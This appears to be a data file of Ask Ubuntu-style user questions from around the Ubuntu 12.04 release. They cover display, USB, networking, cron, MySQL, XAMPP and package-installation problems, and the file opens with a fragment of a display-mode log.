50hz with output at 1280 x 1024 @ 0hz ( pass 0 ) crtc 642 : trying mode 3600x1080 @ 50hz with output at 1280 x 1024 @ 0hz ( pass 1 ) crtc 642 : trying mode 3600x1080 @ 50hz with output at 1280 x 1024 @ 0hz ( pass 1 ) crtc 642 : trying mode 3600x1080 @ 50hz with output at 1280 x 1024 @ 0hz ( pass 1 )
137233	how to command `` ping '' display time and date of ping	when i ping i have this display : > ping -i 4 www.google.fr 64 bytes from wi-in-f94.1e100.net ( 173.194.67.94 ) : icmp_seq=503 ttl=46 time=45.5 ms ... ... . ... ... . 64 bytes from wi-in-f94.1e100.net ( 173.194.67.94 ) : icmp_seq=508 ttl=46 time=44.9 ms 64 bytes from wi-in-f94.1e100.net ( 173.194.67.94 ) : icmp_seq=509 ttl=46 time=45.1 ms i 'd like to have the time of the ping before . something like : > ( right functions ) + ping -i 7 www.google.fr mardi 15 mai 2012 , 10:29:06 ( utc+0200 ) - 64 bytes from wi-in-f94.1e100.net ( 173.194.67.94 ) : icmp_seq=503 ttl=46 time=45.5 ms ... ... . ... ... . mardi 15 mai 2012 , 10:29:13 ( utc+0200 ) - 64 bytes from wi-in-f94.1e100.net ( 173.194.67.94 ) : icmp_seq=508 ttl=46 time=44.9 ms mardi 15 mai 2012 , 10:29:20 ( utc+0200 ) - 64 bytes from wi-in-f94.1e100.net ( 173.194.67.94 ) : icmp_seq=509 ttl=46 time=45.1 ms how would you do this in a command line ( if it 's possible ) ?
137235	why is firefox prism not in the repositories anymore ?	prism is a simple xulrunner-based browser which hosts web applications without the full browser interface . it seems as if firefox prism was removed from the repos since 10.04 ; there is no package for natty ( 11.04 ) , oneiric ( 11.10 ) or precise ( 12.04 ) , only for the lts versions hardy ( 8.04 ) and lucid ( 10.04 ) . people are writing about incompatibility issues with newer firefox versions , but i 'm still using prism without problems on maverick ( 10.10 , no updates anymore ) with the newest firefox from the ppa . is there any reason why prism was removed ? is there any reason i sould not use it and not install it manually ? is there something better or some alternative for > =12.04 ? i know it is possible to create a menu entry ( a .destkop file ) which points to firefox http : //someurl.com/ , but i 'd like also to keep the histories , cache , cookies etc . separted . in additon i find it nice that prism comes with a simplified interface without address bar and so on .
137236	in 12.04 clicking on the launcher icon does not show expo mode for multiple windows	i am running ubuntu 12.04 64bit on my machine and something changed recently , and i am not able to bring up the `` expo mode '' for all windows when clicking on the launcher icon . when clicking twice on a launcher icon for an application that has multiple windows open , unity should show all the open windows right ? or did that change ? do we need to configure this behavior somewhere ?
137237	why does my computer continue to start windows automatically after installing ubuntu ?	i tried to install ubuntu : i loaded it on cd drive and clicked onto `` install ubuntu '' ( not `` try ubuntu '' ) . then in the window ( `` preparing to install ubuntu '' ) i clicked onto `` continue '' , then in the next window i chose `` wireless '' and clicked `` continue '' . as installation type i chose `` install ubuntu alongside windows 7 '' . after that it showed `` restart to continue '' . when i clicked on `` restart and continue '' a black screen like a command prompt appeared and displayed something like : checking battery state checking for running unattended-upgrades : speech-dispatcher disable ; edit /etc/default/speech-dispatcher asking all remaining processes to terminate finally after a few seconds the message `` please remove installation media and close the tray ( if any ) then press enter '' appears . my pc is an asus k43sj core i5 . i did n't follow any guidance because my experience is n't enough in linux .
137243	problem with scp syntax	i am trying to copy a .tar archive from remote server to my pc . directory of the archive that i want to copy : canserhan @ embserv : ~/tar_files/rtl_archive.tar destination : serhan @ serhan-lenovo-b560 : ~/documents $ i connect to remote server and use the command : canserhan @ embserv : ~/tar_files $ scp canserhan @ embserv : ~/tar_files/rtl_archive.tar serhan @ serhan-lenovo-b560 : ~documents $ password : ssh : serhan-lenovo-b560 : name or service not known lost connection canserhan @ embserv : ~/tar_files $ there must be something wrong with the scp syntax i am using . however i could not figure it out . could you please help me ? thanks .
137245	xubuntu 12.04 network manager menu is displayed partially	installed xubuntu 12.04 yesterday , all latest updates are installed . when i login to my xfce session and click on networkmanager icon , very poor menu is shown : but if i disable networking by unchecking `` enable networking '' menu item and then enable it again , i see a full menu : how can i tell networkmanager to show a full menu from the beginning ?
137250	wired internet speed is slow in ubuntu 12.04	i have dual boot windows 7 and ubuntu 12.04 on my dell n4110 laptop . i recently installed ubuntu 12.04 on my existing windows 7 hard drive . i am experiencing very slow internet speed on ubuntu ( wired connection ) . but on windows , internet is really fast . i disabled ipv6 by editing /etc/sysctl.conf no avail . then i run the following command . sudo ethtool -s eth0 speed 100 duplex full autoneg off no benefit . i am having `` realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) '' network card .
137251	dual monitor in 12.04 - sort of works	not an error , per se , more of an observation . since upgrading to 12.04 , i have found and solved some interesting problems . given my complete lack of ubuntu knowledge , this has indeed made me feel more than a little cocky . however , the one ( ! ) thing i can not figure out is the whole dual monitor setup . anyway , the blah bit ... fujitsu siemens amilo 3530 , ati radeon 3200 hd series , 4gb ram 1tb hdd and so on , generic hdmi monitor . got the gnome fglrx loaded with the kosher latest ati driver ( but not the post update one , that one just will not activate ) now , in 11.10 , it just would n't work , at all , not even when tempted with tasty treats and promises of great pleasure . still , i persisted and , when i noticed the 2nd monitor working with the 12.04 try out dvd , i went for it . after getting 12.04 running , the hdmi still shows nothing but blue screen on the telly , telling me 'no signal '' . on vga , if i attempt to set it as a second monitor , i get two errors : the selected configuration could not be applied required virtual size does not fit available size : requested= ( 2880 , 900 ) , minimum= ( 320 , 200 ) , maximum= ( 1600 , 1600 ) then , click close and you get the following : gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code3 : required virtual size does not fit available size : requested= ( 2880 , 900 ) , minimum= ( 320 , 200 ) , maximum= ( 1600 , 1600 ) but , if i mirror the display , it works on the monitor , no problem . so , the fact that it is not working is not my fault ! any one get any suggestions ? ta . mark
137257	auth failed error on windows 7 ultimate	after installing ubuntu one on windows 7 ultimate , when i try to log in , ubuntu gives me back the message : the authentication failed . oh , it 's ok. perhaps i 've forgotten the pass . so i clicked i 've forgotten my password , but when i enter my mail address , ubuntu tells me sorry , we did not recognize the email address . but i can sign in with no problem using the browser ... any ideas ? thanks in advance .
137267	how do i set up apache with multiple sites ?	can i have help with making multiple site working with apache ( lamp ) on ubuntu 12.04 desktop ed . i pointed the apache2 to a home directory with my new sites which were enabled , but the browser is only displaying the default website that come with the apache2 installation . thx
137276	issue running backtrack 5 r2 ( 64bit ) vm on ubuntu 12.04 ( 32bit ) host ?	i upgraded from ubuntu 11.10 to 12.04lts version . mine is 32bit os . i run virtual box on my machine . in virtual box i run bt5r2 ( 64bit ) version . when i was running 32bit version of bt5r2 , it worked fine . but this 64bit version of backtrack just freezes my pc and i have to restart my pc . but one thing i noticed is , i also run ubuntu 11.10 server edition ( 32 bit ) . when i start backtrack first , it freezes my pc . but if i start ubuntu server , then backtrack it just runs fine . i think memory allocation is the problem . i enabled hardware virtualization ( vt-d ) . my pc configuration : intel® core™ i3 cpu 540 @ 3.07ghz × 4 4gb ddr3 ram
137280	how do i stop remmina nagging about rdp certficate validation ?	i 'm rdp-ing to a win2k8 machine from ubuntu 12.04+remmina but every time i 'm prompted with a certificate validation . does anybody knows how to avoid these messages or validate them for good ? .
137281	howto boot into console with ubuntu 12.04 usb stick ?	a lenovo g575 laptop freezes during boot since i upgraded to 12.04 . the same , when i boot it with a 12.04 live usb stick . i guess that it freezes when the gui is initialized . so i would like to boot into the console only without any x11 . but i did n't find corresponding boot options to do that . can this be done from the usb boot menu ?
137284	usb issues and problem with hauppauge wintv nova-t 500	i 'm using a gigabyte ga-b75m-d3h motherboard for a mythtv box which i 've recently upgraded from an m2npv-vm motherboard where i 've never had an issue . my problem is that no usb devices will work from power-up until approx 60 seconds after boot . the usb mouse and keyboard both work immediately at power up and in the bios , but then stop working as soon as grub starts up . this is more of an inconvenience but i 've never seen usb devices not work for a period of time and then start working later . since the capture card i use is a hauppauge wintv nova-t 500 pci card which has a built-in usb 2.0 hub and 2x usb 2.0 tuners in this also does n't work . unlike the mouse/keyboard which start working after 60 seconds , this capture card never works . i think the problem is the usb 2.0 hub on the hauppauge card is being incorrectly identified as a usb 1.1 hub , dmesg shows : [ 55.181377 ] usb 4-1 : new full-speed usb device number 2 using uhci_hcd [ 55.319431 ] usb 4-1 : not running at top speed ; connect to a high speed hub [ 55.359740 ] dib0700 : loaded with support for 21 different device-types [ 55.361404 ] dvb-usb : found a 'hauppauge nova-t 500 dual dvb-t ' in cold state , will try to load a firmware [ 55.363511 ] dvb-usb : downloading firmware from file 'dvb-usb-dib0700-1.20.fw' [ 56.972099 ] dib0700 : firmware started successfully . [ 57.474026 ] dvb-usb : found a 'hauppauge nova-t 500 dual dvb-t ' in warm state . [ 57.474102 ] dvb-usb : this usb2.0 device can not be run on a usb1.1 port . ( it lacks a hardware pid filter ) [ 57.474119 ] dvb-usb : hauppauge nova-t 500 dual dvb-t error while loading driver ( -19 ) [ 57.474138 ] usbcore : registered new interface driver dvb_usb_dib0700 under dmesg , all message look fine up until 17 seconds in where there is a large delay of about 37 seconds related to usb issues . [ 17.686253 ] usb 3-1 : device not accepting address 2 , error -110 [ 17.798232 ] usb 3-1 : new high-speed usb device number 3 using ehci_hcd [ 33.350555 ] usb 3-1 : device not accepting address 3 , error -110 [ 33.462532 ] usb 3-1 : new high-speed usb device number 4 using ehci_hcd [ 43.892050 ] usb 3-1 : device not accepting address 4 , error -110 [ 44.004038 ] usb 3-1 : new high-speed usb device number 5 using ehci_hcd [ 54.433546 ] usb 3-1 : device not accepting address 5 , error -110 [ 54.433557 ] hub 3-0:1.0 : unable to enumerate usb device on port 1 [ 54.517607 ] usb 1-1.3 : new full-speed usb device number 3 using ehci_hcd [ 54.610615 ] hub 1-1.3:1.0 : usb hub found [ 54.610699 ] hub 1-1.3:1.0 : 4 ports detected [ 54.681724 ] usb 1-1.4 : new high-speed usb device number 4 using ehci_hcd i 've had this capture card working fine with previous versions of ubuntu and other motherboards , but i suspect the issue is usb related . lsusb shows the capture card as : bus 004 device 002 : id 2040:9950 hauppauge wintv nova-t-500 uname -a shows the kernel as : 3.2.0-24-generic-pae i am using an intel core i5-2400 cpu @ 3.10ghz ubuntu version 12.04 lts with all updates applied . i 've tried changing several bios options related to usb and looked into acpi type issues and tried acpi kernel options but have come up blank , it seems nothing i change makes a difference . thanks in advance for any help
137287	virtualbox : resolvconf in ubuntu 12.04 host breaks dns in winxp guest	[ x-post to vbox forums ] virtualbox : ubuntu 12.04 host , winxp sp3 guest . the recent change in dns handling in ubuntu 12.04 is described here . it means that a nat'ed winxp host will receive a 127.0.0.1 dns server ip , which prevents dns from working out-of-the-box in the guest . a workaround is to set the dns server ( s ) manually in the guest every time . what is the recommended virtualbox setup for hosts running resolvconf ( assuming the host does not have a static ip ) to make dns work seamlessly in the guest ?
137289	power saving enabled after upgrade	recently we 've upgraded from 11.10 to 12.04 and the monitor goes on energy saving ( and wakes when there 's any input ( mouse/keyboard ) ) . however , the odd thing is , that it 's completely disabled in the system settings . it 's set to 'never ' in 'brightness and lock ' and suspend is disabled in 'power ' . i 've also tried sudo gsettings set org.gnome.settings-daemon.plugins.power active false and sudo gsettings set org.gnome.desktop.screensaver idle-activation-enabled false but the monitor still goes to energy saving within 10 minutes of inactivity . this has probably todo with the upgrade , as it did n't before . do you have any idea what can be done to solve this ? edit seems when i have a chrome window in full screen ( f11 ) the screen does n't turn off .
137292	repo to install picasa	is there any repo to install picasa from ? the one listed in this tutorial does n't seem to be working anymore , or at least not for 12.04 . thanks !
137294	what flags can i add or are added when loading the kernel to enhance sandy/ivy bridge performance	are there any flags in ubuntu 12.04 that i can add or are added already that when loading the kernel it enhances the performance of sandy or ivy bridge hardware ? in my case my motherboard is the dz68db : http : //www.intel.com/content/www/us/en/motherboards/desktop-motherboards/desktop-board-dz68db.html
137295	how can i re-enable `` never show '' notifications in xubuntu 12.04 ?	i 've pressed the button `` never show again '' on the notification related to the successful connection to a vpn network . how can i re-enable this notification ?
137297	how to install dssp ( secondary structure assignments ) under 12.04 ?	i am trying to install dssp on ubuntu 12.04 . i am new to ubuntu . i tried this sudo apt-get install dssp please give suggestions .
137299	how to have a azerty layout and numbers without push shift ?	i 'm french and i 'm used to an azerty layout . nevertheless i find painfull the fact to push shift to get numbers , and want to keep an azerty layout but with the numbers in qwerty style . is it possible ? such layout exists on mac ( a layout called french numeric ) but not seem to exist in ubuntu ( or with a strange name ) .
137310	i seem to have forgoten my password	i thought i would be clever and when i installed ubuntu in a dual boot , use a new password . so naturally i immediately forgot what i used . i have no problem reinstalling ubuntu but how do i completely uninstall it ?
137318	how to uninstall ubuntu from a dual boot system ?	i have dual boot laptop having two os windows 7 and ubuntu . i want to remove ubuntu and merge space with windows .
137320	run java application as cron job	i 've tried everything i can think and searched high and low for solutions of but i ca n't get java_home into cron to run anything java periodically . in terminal java -version gives me everything you 'd expect . 'which java ' prints '/usr/bin/java' i 'm also running java applications fine from bash scripts launched in terminal . i want to run them periodically from cron but it is refusing to . my crontab path=/usr/sbin : /usr/bin : /sbin : /bin : /usr/lib/jvm/java-6-sun/bin java_home=/usr/lib/jvm/java-6-sun * * * * * /bin/bash -- version > /tmp/b.log * * * * * /usr/bin/java -version > /tmp/j.log which fills b.log with text but j.log is empty . i have also tried adding export java_home=/usr/lib/jvm/java-6-sun to the top of scripts as well but no dice . any pointers ?
137322	ubuntu 12.04 gnome terminal ( 3.4.1.1 ) xorg 100 % cpu	after upgrading ubuntu 11.04 to 12.04 ( x64 arch ) maximizing or resizing gnome terminal ( 3.4.1.1 ) windows larger cause the xorg ( 1.11.3 ) or x process to utilize 100 % cpu . resizing smaller , moving windows or minimizing do not seem to have the same impact but by no means are snappy either . i 'm running on a dell e6500 laptop ( upgraded from 11.04 ) running the nvidia proprietary drivers v. 295.49 ( quadro nvs 160m ) with compiz 0.9.7.8 . other terminals such as xterm/uxterm are unaffected . hoping it has to do with some configuration settings but not sure where to look ( nvidia/compiz/gnome/x ? ) . thanks !
137325	how can i get out of low graphics mode on 12.04 ?	i can not boot my laptop with 12.04 ( or any older version ) cos i keep getting the error message of `` low graphics mode , `` i click `` ok '' and then it gets stuck on a window giving me 4 options and i can not do or choose anything , how can i fix this ?
137327	is this file a virus ? it 's jquery and turned up in clam tk as a threat	does anyone know what this is and how to remove it , because it keeps turning up everytime i remove it with clam tk . i have only added a part of the file because it it superbig . just want to know how to prevent it from coming back . and what the hell it is . /* ! jquery v1.7.2 jquery.com | jquery.org/license / ( function ( a , b ) { function cy ( a ) { return f.iswindow ( a ) ? a : a.nodetype===9 ? a.defaultview||a.parentwindow : ! 1 } function cu ( a ) { if ( ! cj [ a ] ) { var b=c.body , d=f ( `` < `` +a+ '' > '' ) .appendto ( b ) , e=d.css ( `` display '' ) ; d.remove ( ) ; if ( e=== '' none '' ||e=== '' '' ) { ck|| ( ck=c.createelement ( `` iframe '' ) , ck.frameborder=ck.width=ck.height=0 ) , b.appendchild ( ck ) ; if ( ! cl|| ! ck.createelement ) cl= ( ck.contentwindow||ck.contentdocument ) .document , cl.write ( ( f.support.boxmodel ? `` `` : '' '' ) + '' '' ) , cl.close ( ) ; d=cl.createelement ( a ) , cl.body.appendchild ( d ) , e=f.css ( d , '' display '' ) , b.removechild ( ck ) } cj [ a ] =e } return cj [ a ] } function ct ( a , b ) { var c= { } ; f.each ( cp.concat.apply ( [ ] , cp.slice ( 0 , b ) ) , function ( ) { c [ this ] =a } ) ; return c } function cs ( ) { cq=b } function cr ( ) { settimeout ( cs,0 ) ; return cq=f.now ( ) } function ci ( ) { try { return new a.activexobject ( `` microsoft.xmlhttp '' ) } catch ( b ) { } } function ch ( ) { try { return new a.xmlhttprequest } catch ( b ) { } } function cb ( a , c ) { a.datafilter & & ( c=a.datafilter ( c , a.datatype ) ) ; var d=a.datatypes , e= { } , g , h , i=d.length , j , k=d [ 0 ] , l , m , n , o , p ; for ( g=1 ; g '' ) k=l ; else if ( l ! == '' '' & & l ! ==k ) { m=l+ '' `` +k , n=e [ m ] ||e [ `` `` +k ] ; if ( ! n ) { p=b ; for ( o in e ) { j=o.split ( `` `` ) ; if ( j [ 0 ] ===l||j [ 0 ] === '' '' ) { p=e [ j [ 1 ] + '' `` +k ] ; if ( p ) { o=e [ o ] , o=== ! 0 ? n=p : p=== ! 0 & & ( n=o ) ; break } } } } ! n & & ! p & & f.error ( `` no conversion from `` +m.replace ( `` `` , '' to `` ) ) , n ! == ! 0 & & ( c=n ? n ( c ) : p ( o ( c ) ) ) } } return c } function ca ( a , c , d ) { var e=a.contents , f=a.datatypes , g=a.responsefields , h , i , j , k ; for ( i in g ) i in d & & ( c [ g [ i ] ] =d [ i ] ) ; while ( f [ 0 ] === '' '' ) f.shift ( ) , h===b & & ( h=a.mimetype||c.getresponseheader ( `` content-type '' ) ) ; if ( h ) for ( i in e ) if ( e [ i ] & & e [ i ] .test ( h ) ) { f.unshift ( i ) ; break } if ( f [ 0 ] in d ) j=f [ 0 ] ; else { for ( i in d ) { if ( ! f [ 0 ] ||a.converters [ i+ '' `` +f [ 0 ] ] ) { j=i ; break } k|| ( k=i ) } j=j||k } if ( j ) { j ! == i hope someone can help . thank you , laura
137328	find mac address of a device connected to my computer	i have a `` black-box device '' ( a credit card reader , to which some klutz lost the admin unlock card ... ) running an unknown , but primitive , operative system . i need to find it 's mac address . at my disposal , i have the device itself ( but no access to its admin interface ) , a computer running ubuntu 12.04 ( where i have full sudo rights ) , and a regular ethernet cable . if necessary , i can probably shake up an ethernet switch , too . how do i go about to find the mac address of the card reader ?
137331	numerous problems with ubuntu 11.10 , have to use my windows partition now : (	i have used ubuntu for almost a year now , but recently i have been forced to use my windows partition because i ca n't connect to the internet . i can see a list of available wireless routers but i can not connect to one when i click on it . so , no internet . my user is the administrator but i ca n't change anything in the settings . i can not change users , restart or turn off the computer . i was thinking that if i upgrade to ubuntu 12.04 it will work again . but without internet that wo n't work . : (
137334	ca n't install both libmyodbc and iodbc at the same time on ubuntu 12.04 ?	i 'm following this tutorial on adding an odbc driver to ubuntu . i installed iodbc and then i went to install libmyodbc and noticed that it uninstalled iodbc , and now i ca n't follow the rest of the tutorial ... because either the driver is gone , or the gui to install the driver is gone . iodbcadm-gtk is part of the iodbc package but when libmyodbc is installed it removes the iodbc , rendering it useless .
137336	how do i remove the shutdown button only on the login screen ?	i do n't want anyone to be able to shut down my computer from the login screen . can i remove the shutdown button at the top right corner of the login screen in ubuntu 12.04 ?
137347	second click on a launcher icon with more than one window open does n't do a scale of that application	if i click an icon in the launcher with multiple windows open it does n't show me all open windows for that application ( like ctrl+w does for all open windows ) . i seem to remember it working as follows for applications with multiple open windows : 1 ) click on an icon in the launcher of an opened application 2 ) if the application did n't have focus , it brings the most recently used application to focus ( i.e . to the front ) 3 ) if you click on the launcher icon again , or if the application already had focus you are presented with a spread/scale of all the open windows of the application and you can then select the window you want by clicking it . am i just wrong ? how is the launcher supposed to handle multiple open windows ? if i am right , how can i fix my launcher to behave like this ? i should also add that everything else works great and the ctrl+w does the scale/spread for all open windows as usual .
137348	unable to connect other drivers , that installed in windows operating system	i had installed windows7 and i want to try the ubuntu . i had choose the dual booting system . after that i choose to ubuntu to work with , but there is no option to select my drivers and access those files that i can saved through my windows7 operating system . in windows there is one icon my computer that shows all the drivers in that systems , unfortunately there is no option in ubuntu to select that files . in ubuntu there is only access to home folders , no others folders . eg i had c , e and f drive in my system using windows fat partition system i have easy access with my computer option in window , but in ubuntu there is no option to access those files . if there is any icon like my computer instead of home folder icon it is very easy to access all the files .
137353	corrupt screen with an nvidia 6100 on a hp s2031 monitor	on a blank 20g drive i loaded a cd install , it gets to the choice screen , but the screen corrupts either in try mode or install mode , it gives a login screen on the left side of the screen and processes that , but the main screen is corrupt and un-useable , the only way out is to pull the power plug . this is a desktop with a asus m2n_mx motherboard , 1g memory , nvidia geforce 6100 graphics , driving a hp s2031a screen . the problem is the hp s2031 monitor will only do 1600x900 max resolution , and during 12.04 boot the monitor complains that the 'monitor signal is out of range' digging around the web , this looks like a failure of the screen to sync properly , so do i need different nvidia drivers , or just change a setting somewhere . presumably 12.04 is sending a signal to the monitor that it can not display , and i need to change this setting , but how ? i can not use esc to stop 12.04 and get into edit grub , and the screen wont display sensibly to let me in terminal . i also run windows xp , without problems .
137355	how to disable macbook keyboard backlight	how do i disable the keyboard backlight , by turning it completely off , on a macbook in 12.04 ? whenever i reboot , ubuntu sets the backlight to 100 % brightness , and frustratingly the new function keys no longer support being held down , so i have to press the dim key about 50 times to turn off the backlight .
137356	dual monitor with nvidia graphics : damaged 'displays '	i just got ubuntu 12.04 and the graphical options were working fine with one monitor . after installing the second monitor there are many glitches and issues . too many , sadly . i am asking here about one in particular : if i execute : displays under system settings i get the error : `` randr extension is not present '' . sometimes after moving windows or switching workspaces i get an error saying that compiz crashed too . any thoughts/solutions on that ? i am using : geforce 9400 gt , 512 mb nvidia dryver : 295.40
137359	what mouse model do i need to not have double click problem in lp:365300 ?	i 'm experiencing a problem with my mouse model logitech b110 . i looked on the internet and found that certain mouse models does have a problem in ubuntu 11.10 and now in 12.04 . my mouse is one of them . i usually experience this bug : i click once ( does n't matter which button ) , but got double click instead . according to what i found on the internet this somehow tied with amount of electrical current that is generated by mouse as a response to click and this problem hardly will be addressed in ubuntu in the near future . so i would like to have a list of 'officially ' or not 'officially ' mouses that do n't have such problem .
137365	xubuntu 12.04 : replace thunar with nautilus in places plugin	i want to replace thunar with nautilus ( because nautilus has internal file search panel and thunar does n't ) i 've read this question but unfortunately it does n't work with places xfce plugin : when i open any folder from place it still launches thunar . is there a way to launch nautilus from places plugin ?
137366	wmf files no longer recognised ; can not work with them in gimp	back in 8.04 and 10.04 , gimp could easily open wmf files , letting me work on them . in 11.04 , there was a regression ( still not fixed ! ) , and this would not work . but at least there was a workaround . you could convert wmf files to eps and work on them . wmf2eps -- wmf-fontdir=/usr/share/fonts/type1/gsfonts -o outputfile.eps inputfile.wmf however , now we have 12.04 , and not even the workaround works any more ; it is unable to convert the file . there is no error message ; it just fails with error code 1 . despite inkscapes claims to be a plausible solution ( workaround ) inkscape simply opened the wmf image as a completely empty image , with no error message . i need to work on wmf files quite urgently . does anyone know what i can do , whether work-around or ( preferably ) a fix ?
137372	how do i install and run opera browser on ubuntu 10.04 ?	i have been trying to run opera on ubuntu but wine is installing the application but not running the application , any suggestion and how to approach the problem ?
137374	backlight problems with 12.04 on my acer aspire 4736z	how can i fix a bug that would n't let me turn the backlight on after it turns off automatically when i close the lid or when powersave settings kick in ? i also ca n't adjust the brightness of the screen through the fn + left/right arrow button combination , how can i make this work ? and one last thing , when i try to follow some of the fixes that are being suggested in forums , like editing the etc/x11/xorg.conf by using the terminal command sudo gedit , the file that i 'm supposed to edit is totally blank . and when i look at the folder i did n't see a file `` xorg.conf '' but i saw `` xorg.conf.failsafe '' i tried creating a xorg.conf but i ca n't save the file . what shall i do in this kind of scenario , just in case the solution for my first 2 question requires sudo gedit ? thanks !
137387	user menu in gnome shell ( gnome 3.4 ) - entries missing	for example there is no logout button : if i log in with the guest session , everything seems to be fine ( there is a log out button ) . i tried to remove my whole user directory and create an empty one , but the problem remains . i am running gnome shell 3.4 using the ppas ppa : gnome3-team/gnome3 and ppa : ricotz/testing as described in this answer . i disabled all shell extensions and restarted the computer , but the problem remains . another difference between my user and the guest user i noticed : when i close the last window on the current workspace , the activitiy overview appears . this annoying beheviour seems to be disabled for the guest user . i 'm thinking to switch to debian . i try to get 12.04 running with gnome shell since 2 days now ...
137393	suspend killed my laptop ( ca n't resume , ca n't reboot , no bios screen )	i just got a toshiba satellite c675d-s7109 and installed ubuntu 12.04 ( 64-bit ) on it . i installed all the updates as well but did n't install the fglrx drivers . seemed like it was working fine . i suspended the laptop . whoops , now it 's a brick . no key , mouse button , or power button would resume it . the fan was still running and both power leds were on ( one indicating the laptop is plugged in , one indicating it 's powered on ) . i held down the power button for 8s to force it to power off . fan goes off , hd spins down , power light goes out , all as expected . when i hit the power button to turn it back on , fan comes on , hd spins up , but it does n't show the bios splash screen or anything -- just a totally black screen , like before i powered it off . edit : i removed the battery for a while and now it boots normally . should i just disable suspend or is there a way around this ? edit2 : i tried sudo pm-hibernate -- it did n't shut down the laptop but after forcing power off and powering back on it resumed just fine .
137396	boot takes about 12 hours is fine after	i only realised it was working when i left it booting over night : ) works fine once loaded but takes about 12 hours to boot . the install cd does the same . elonex soliton-b compal acl10 ( i845m + ich3 + nvidia sq17 ) mobile intel ( r ) pentium ( r ) 4 -m cpu 2.20ghz i have usb legacy switched off and nothing plugged in i 've switched off the quiet splash and after a few similar blocks it seems to be sat there saying : [ 0.507595 ] pc1 0000:02:04.1 : bridge window [ mem 0x4c000000-0x4ffffff pref ] [ 0.507745 ] pc1 0000:00:1e.0 : pci bridge to [ bus 02-02 ] [ 0.507887 ] pc1 0000:00:1e.0 : bridge window [ io 0x3000-0x3fff ] [ 0.508091 ] pc1 0000:00:1e.0 : bridge window [ mem 0xe000000-0xe00fffff ] [ 0.508247 ] pc1 0000:00:1e.0 : bridge window [ mem 0xe0100000-0xe01fffff pref ] ( edit ) after about 45 minutes sat at the above the screen has gone completely blank .
137398	32-bit ubuntu vs 64-bit ubuntu dual boot with windows 7 32-bit ?	i have intel dh55tc motherboard with intel i3 530 . i have 4gb ram . suggest me correct version of ubuntu to use . whether 32 bit or 64 bit is suitable for me .
137399	minecraft server automaticly moves to home folder	me and my friends are having a minecraft server on our dropbox folder and whenever i start the sever it starts a new server and moves it into my home folder . if i already have a server in my home folder , it starts that one . how can i run the server in directly from the dropbox folder ? like windows users can i 'm running ubuntu 12.04 64bit solved ! : followed these instructions [ solved ] how do i change linux minecraft server directory ? how can i put this as solved when the one with the answer putted it as a comment ?
137408	how can i return to my default ubuntu shell	i am running ubuntu 12.04 lts and i once changed the ubuntu shell by logging out and choosing a different shell from the top-right corner in the log-in box and now i do not know how to return to the default shell . please help me as i just installed ubuntu ! thanks
137410	xamppp lampp unistall and error	today i installed xampp from their website and just downloaded and extracted on my linux os ( using tar xvfz ) command and i started it using /lampp start . everything started perfectly and i wanted it to be secure so i ran the command /opt/lampp/lampp security and gave some passwords . i ran localhost on my browser and then clicked on phpmyadmin but it asked a username and a password i couldnt log in so i removed the whole xampp with rm-rf/opt lampp command and again installed as above but now when i start i get a messgae like dis : another daemon is already running for all php mysql ftp and all other services how to correct this if u can let me know how to remove everything nd reinstall it again . or how to fix problem i have uninstalled and reinstalled about 4 times .
137413	how do i add bengali support ?	how to type bengali using ubuntu 12.04 . i had installed ibus but unable to find the list of languages from the drop down list when i try to add bengali through input method .
137415	loop in bash to create decimal number	how to generate a numbers 0.01 , 0.02 , 0.03 ... until 0.2 in bash ? i run this example but it does n't work # ! /bin/bash # # script for running several experimentations one the same jvm # for ( ( i = 0 ; i < 0.1 ; i += 0.01 ) ) do echo $ i done
137416	how do i fix a partition i made installing ubuntu	so i went to install ubuntu 12 on my toshiba laptop . i accidently resized my windows 7 partition to 60 gb and gave ubuntu 241 gb of space . i wanted to have ubuntu as 60gb and have the remaining space for windows 7 . how can i fix the mistake i made ?
137417	ca n't detect/use external monitor on hp pavilion dv5	i 've just installed ubuntu 12.04 lts on a hp pavilion dv5 laptop that was previously with ubuntu 11.04 . the installation was not an upgrade , was a fresh install to clean up the hard-drive with an erase and wipe tool . when running the live cd , and testing ubuntu prior to the installation , all was ok , the desktop was present both on lcd and external monitor . but after the installation , the external monitor does not show any image . the relevant specifications : hp pavilion dv5-1160 nvidia geforce 9200m gs - 256 mb any idea on how to solve this issue or install some application that might help identify the problem ?
137421	volume keys are working in unity but not in xfce4	my volume keys are not working in xfce . when i used them it shows an indication on the screen that the volume is being changed , but the volume is not changing at all ( same thing with the mute key ) . the weird thing is that when i go from xfce to ubuntu the keys are now working fine . i do n't know if this matters but i have a sound card in my computer . how can i make the volume keys work in xfce ?
137422	`` empty partition ! '' in mac after created that with disk utility	i just got a new hard drive yesterday , 2tb , and copied across all the files i needed , into two partitions in the new 2tb disk , that i created in disk utility ( command palimpsest ) . one was 500gb and the other was 1tb . they were both fat32 , as they needed to be read by linux , macosx and windows . so i transferred data to the partitions respectively , and when i plugged the hard drive into the mac machine , it just said there was nothing there at all . back to the ubuntu machine , and i looked around in disk utility to see that the type was fat32 , but the partition type was showing empty ( 0x00 ) . tried to change it in the edit partition button but no avail . gparted also does n't recognize them either . i can not mount and view the files and i do n't want to wipe it and start again , as it took over 7 hours to transfer the data . anyone got any ideas ?
137424	moving mysql datadir	i am trying to move the data directory of my mysql database to a second disk array that i have as a mount point /array2/ . the problem i am having is i have tried everything and after i modify the location of datadir in my.cnf mysql will not start up again . all i get is : start : job failed to start
137426	can not use software-center to install packages from local repository without internet	i have a local repository as instructed in this tutorial . it is a trusted repository , so no `` authentication errors '' are there . i 've tested it with synaptic and apt-get . i was being able to use this with lucid , natty , and oneiric . but i do n't want to install synaptic every time , i install ubuntu ( since synaptic is removed from default live cd since oneiric ) . the problem is : `` ubuntu software center '' does not install packages from local repository . the install button is greyed out . it installs packages only when i connect to the internet and for some unknown reason it re-downloads ( sometimes ) the packages which are also in my local repository . my question is : how can i use software-center to install packages from local repository without connecting to the internet ? note : i have placed my local apt line to the top of the sources.list file and installing from apt-get does not require connecting to the internet here is the output of command from apt-get : anwar @ ubuntu : ~ $ sudo apt-get install nautilus-wipe -- print-uris [ sudo ] password for anwar : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : nautilus-wipe 0 upgraded , 1 newly installed , 0 to remove and 131 not upgraded . need to get 0 b/30.7 kb of archives . after this operation , 150 kb of additional disk space will be used . 'file : /media/main/linux-software/ubuntu/precise/./precise-debs/nautilus-wipe_0.1.1-2_i386.deb ' nautilus-wipe_0.1.1-2_i386.deb 30730 